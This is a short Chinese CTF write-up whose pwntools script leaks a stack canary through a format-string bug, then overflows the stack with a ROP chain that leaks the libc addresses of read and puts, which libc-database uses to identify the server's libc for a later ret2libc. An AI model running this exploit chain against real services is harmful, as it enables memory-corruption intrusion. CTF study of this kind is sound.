记录下学到的姿势：利用信息泄露得到服务器 libc 中至少两个函数的偏移，再利用 libc-database 得到服务器 libc 的版本。
泄露脚本如下
# Python 2 pwntools script (the bare `print x` statements below are py2 syntax) for the
# CTF binary "./story". Flow visible in the code: (1) a format-string leak of the stack
# canary, (2) a stack overflow that returns into a short ROP chain printing one GOT entry
# with puts and then re-enters main, (3) the same two steps again for a second GOT entry.
# The two leaked libc addresses are later fed to libc-database to identify the remote build.
# Defender's view: everything hangs on the format-string bug in the "ID" prompt (user input
# reaches a format string); without that leak the canary stops the overflow. The hard-coded
# gadget and main addresses also rely on the binary not being PIE.
from pwn import *
context.log_level='DEBUG'
r=remote('ctf2.linkedbyx.com',10755)
#r=process('./story')
elf=ELF('./story')
'''
rop_chain=
payload='a'*0x90+canary+'b'*8+rop_chain
r.sendlineafter('Tell me the size of your story:',payload)
'''
'''
0x0000000000400bd3 : pop rdi ; ret
'''
main=0x0000000000400876
# Leak 1: '%15$p' prints the 15th positional argument as a pointer; the program echoes it
# after 'Hello ', and the 18 chars read back ('0x' + 16 hex digits) are taken as the canary.
r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))
# Overflow layout: 0x88 bytes of filler up to the canary slot, the leaked canary, 8 more bytes
# (presumably the saved rbp), then the chain pop rdi;ret -> GOT entry of read -> puts@plt -> main.
payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')   # presumably answers the "size of your story" prompt seen in the dead code above — verify
r.sendlineafter(':',payload)
read=r.recv(12)   # raw bytes puts printed for the read GOT entry; not decoded here (hex() call stays commented out)
print read
#success('read:'+hex(read))
#r.interactive()
# Leak 2: main was re-entered by the chain, so the canary leak and overflow are repeated,
# this time dumping the GOT entry of puts.
r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))
payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')
r.sendlineafter(':',payload)
puts=r.recv(12)   # raw bytes puts printed for its own GOT entry
print puts
r.interactive()   # hand the session to the operator; the libc lookup is done offline with the two values
之后执行 ./find read 250 puts 690（参数为两个泄露地址的低 12 位）即可查出服务器的 libc 版本。
root@snip3r:~/libc-database# ./find read 250 puts 690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)
有了 libc 版本之后，直接构造 ROP 链即可。